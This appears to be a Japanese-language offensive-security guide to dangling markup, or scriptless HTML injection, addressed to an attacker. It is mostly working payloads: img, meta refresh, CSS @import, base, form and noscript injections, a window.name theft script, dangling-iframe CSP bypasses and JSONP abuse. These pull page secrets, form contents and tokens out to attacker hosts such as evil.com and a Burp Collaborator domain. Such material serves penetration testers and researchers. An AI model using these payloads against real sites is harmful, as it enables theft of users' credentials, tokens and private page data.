Dangling Markup - HTML scriptless injection

概要

この技術は、HTMLインジェクションが見つかった場合にユーザーから情報を抽出するために使用できます。これは、XSSを悪用する方法が見つからない場合に非常に便利ですが、いくつかのHTMLタグを注入できる場合に特に有用です。 また、HTML内にクリアテキストで保存された秘密があり、それをクライアントから抽出したい場合や、スクリプトの実行を誤解させたい場合にも便利です。

ここでコメントされた複数の技術は、情報を予期しない方法（HTMLタグ、CSS、HTTPメタタグ、フォーム、ベースなど）で抽出することによって、いくつかのコンテンツセキュリティポリシーを回避するために使用できます。

主なアプリケーション

クリアテキストの秘密を盗む

ページが読み込まれるときに<img src='http://evil.com/log.cgi?を注入すると、被害者は注入されたimgタグとコード内の次の引用符の間のすべてのコードを送信します。そのチャンクに秘密が含まれている場合、あなたはそれを盗むことができます（ダブルクオートを使用して同じことを行うこともできます。どちらがより興味深いかを確認してください）。

imgタグが禁止されている場合（例えばCSPのため）、<meta http-equiv="refresh" content="4; URL='http://evil.com/log.cgi?を使用することもできます。

<img src='http://attacker.com/log.php?HTML=
<meta http-equiv="refresh" content='0; url=http://evil.com/log.php?text=
<meta http-equiv="refresh" content='0;URL=ftp://evil.com?a=

注意してほしいのは、Chromeは"<"や"\n"を含むHTTP URLをブロックするため、"ftp"のような他のプロトコルスキームを試すことができます。

また、CSS @importを悪用することもできます（";"が見つかるまで全てのコードを送信します）。

<style>@import//hackvertor.co.uk?     <--- Injected
<b>steal me!</b>;

あなたは**<table**を使用することもできます：

<table background='//your-collaborator-id.burpcollaborator.net?'

あなたは <base タグを挿入することもできます。すべての情報は引用が閉じられるまで送信されますが、いくつかのユーザーインタラクションが必要です（ユーザーはリンクをクリックする必要があります。なぜなら、base タグがリンクによって指されるドメインを変更するからです）：

<base target='        <--- Injected
steal me'<b>test</b>

フォームの盗難

<base href='http://evil.com/'>

その後、データをパスに送信するフォーム（例えば <form action='update_profile.php'>）は、悪意のあるドメインにデータを送信します。

フォームの盗難 2

フォームヘッダーを設定します：<form action='http://evil.com/log_steal'> これにより、次のフォームヘッダーが上書きされ、フォームからのすべてのデータが攻撃者に送信されます。

フォームの盗難 3

ボタンは、属性 "formaction" を使用して、フォームの情報が送信されるURLを変更できます：

<button name=xss type=submit formaction='https://google.com'>I get consumed!

攻撃者はこれを使用して情報を盗むことができます。

この攻撃の例をこの文書で見つけてください。

プレーンテキストの秘密を盗む 2

最新の技術を使用してフォームを盗む（新しいフォームヘッダーを注入する）ことで、新しい入力フィールドを注入することができます：

<input type='hidden' name='review_body' value="

この入力フィールドには、HTML内の二重引用符の間のすべてのコンテンツと次の二重引用符が含まれます。この攻撃は「Stealing clear text secrets」と「Stealing forms2」を組み合わせたものです。

フォームと<option>タグを注入することで同じことができます。閉じた</option>が見つかるまでのすべてのデータが送信されます：

<form action=http://google.com><input type="submit">Click Me</input><select name=xss><option

フォームパラメータインジェクション

フォームのパスを変更し、新しい値を挿入することで、予期しないアクションが実行されることがあります：

<form action='/change_settings.php'>
<input type='hidden' name='invite_user'
value='fredmbogo'>                                        ← Injected lines

<form action="/change_settings.php">                        ← Existing form (ignored by the parser)
...
<input type="text" name="invite_user" value="">             ← Subverted field
...
<input type="hidden" name="xsrf_token" value="12345">
...
</form>

ノースクリプトを介したクリアテキストの秘密の盗難

<noscript></noscript> は、ブラウザがJavaScriptをサポートしていない場合にその内容が解釈されるタグです（Chromeでは、chrome://settings/content/javascriptでJavaScriptを有効/無効にできます）。

攻撃者が制御するサイトに対して、注入ポイントからページの内容を下部まで流出させる方法は、これを注入することです：

<noscript><form action=http://evil.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=""><textarea name=contents></noscript>

ユーザーインタラクションを用いたCSPのバイパス

このportswiggersの研究から、最もCSPが制限された環境でも、ユーザーインタラクションを用いることでデータを抽出できることがわかります。この場合、ペイロードを使用します:

<a href=http://attacker.net/payload.html><font size=100 color=red>You must click me</font></a>
<base target='

注意してください、あなたは犠牲者にリンクをクリックさせ、そのリンクがあなたが制御するペイロードにリダイレクトされるようにします。また、baseタグ内のtarget属性は、次のシングルクォートまでHTMLコンテンツを含むことに注意してください。 これにより、リンクがクリックされた場合の**window.nameの値はすべてそのHTMLコンテンツになります。したがって、あなたがリンクをクリックすることで犠牲者がアクセスしているページを制御しているため、そのwindow.nameにアクセスし、そのデータを抽出**することができます：

<script>
if(window.name) {
new Image().src='//your-collaborator-id.burpcollaborator.net?'+encodeURIComponent(window.name);
</script>

誤解を招くスクリプトワークフロー 1 - HTML 名前空間攻撃

HTML内に新しいタグを挿入し、次のタグを上書きするidを持たせ、スクリプトの流れに影響を与える値を設定します。この例では、情報が誰と共有されるかを選択しています：

<input type='hidden' id='share_with' value='fredmbogo'>     ← Injected markup
...
Share this status update with:                              ← Legitimate optional element of a dialog
<input id='share_with' value=''>

...

function submit_status_update() {
...
request.share_with = document.getElementById('share_with').value;
...
}

誤解を招くスクリプトワークフロー 2 - スクリプトネームスペース攻撃

HTMLタグを挿入することで、JavaScriptネームスペース内に変数を作成します。次に、この変数がアプリケーションのフローに影響を与えます：

<img id='is_public'>                                        ← Injected markup

...

// Legitimate application code follows

function retrieve_acls() {
...
if (response.access_mode == AM_PUBLIC)                    ← The subsequent assignment fails in IE
is_public = true;
else
is_public = false;
}

function submit_new_acls() {
...
if (is_public) request.access_mode = AM_PUBLIC;           ← Condition always evaluates to true
...
}

JSONPの悪用

JSONPインターフェースを見つけた場合、任意のデータで任意の関数を呼び出すことができるかもしれません:

<script src='/editor/sharing.js'>:              ← Legitimate script
function set_sharing(public) {
if (public) request.access_mode = AM_PUBLIC;
else request.access_mode = AM_PRIVATE;
...
}

<script src='/search?q=a&call=set_sharing'>:    ← Injected JSONP call
set_sharing({ ... })

また、いくつかのjavascriptを実行してみることもできます:

<script src='/search?q=a&call=alert(1)'></script>

Iframeの悪用

子ドキュメントは、クロスオリジンの状況でも親のlocationプロパティを表示および変更する能力を持っています。これにより、iframe内にスクリプトを埋め込むことができ、クライアントを任意のページにリダイレクトすることが可能になります：

<html><head></head><body><script>top.window.location = "https://attacker.com/hacked.html"</script></body></html>

これを軽減するには、次のようなものを使用できます: sandbox=' allow-scripts allow-top-navigation'

iframeは、iframe name属性を使用して、別のページから機密情報を漏洩させるためにも悪用される可能性があります。これは、HTMLインジェクションを悪用して機密情報がiframe name属性内に表示されるようにするiframeを作成でき、その名前に初期iframeからアクセスして漏洩させることができるためです。

<script>
function cspBypass(win) {
win[0].location = 'about:blank';
setTimeout(()=>alert(win[0].name), 500);
}
</script>

<iframe src="//subdomain1.portswigger-labs.net/bypassing-csp-with-dangling-iframes/target.php?email=%22><iframe name=%27" onload="cspBypass(this.contentWindow)"></iframe>

For more info check https://portswigger.net/research/bypassing-csp-with-dangling-iframes

<meta abuse

meta http-equiv を使用して、Cookieを設定するなどのいくつかのアクションを実行できます: <meta http-equiv="Set-Cookie" Content="SESSID=1"> またはリダイレクトを実行することができます（この場合は5秒後）: <meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />

これは、http-equiv に関する CSP で回避できます（ Content-Security-Policy: default-src 'self'; または Content-Security-Policy: http-equiv 'self';）

New <portal HTML tag

<portal タグの脆弱性に関する非常に興味深い研究をこちらで見つけることができます。 この文を書いている時点では、chrome://flags/#enable-portals でポータルタグを有効にする必要があります。そうしないと機能しません。

<portal src='https://attacker-server?

HTML Leaks

HTMLにおける接続漏洩のすべての方法がDangling Markupに役立つわけではありませんが、時には助けになることがあります。ここで確認してください: https://github.com/cure53/HTTPLeaks/blob/master/leak.html

SS-Leaks

これはdangling markupとXS-Leaksの ミックスです。一方で、この脆弱性は同じオリジンのページにHTMLを注入することを可能にしますが、JSは注入できません。もう一方では、HTMLを注入できるページを直接攻撃するのではなく、別のページを攻撃します。

XS-Search/XS-Leaks

XS-Searchはサイドチャネル攻撃を悪用してクロスオリジン情報を抽出することを目的としています。したがって、これはDangling Markupとは異なる技術ですが、一部の技術はHTMLタグの挿入（JS実行の有無にかかわらず）を悪用します。例えば、CSS InjectionやLazy Load Imagesです。

Brute-Force Detection List

Auto_Wordlists/dangling_markup.txt at main · carlospolop/Auto_WordlistsGitHub

References

• https://aswingovind.medium.com/content-spoofing-yes-html-injection-39611d9a4057

• http://lcamtuf.coredump.cx/postxss/

• http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/

• https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup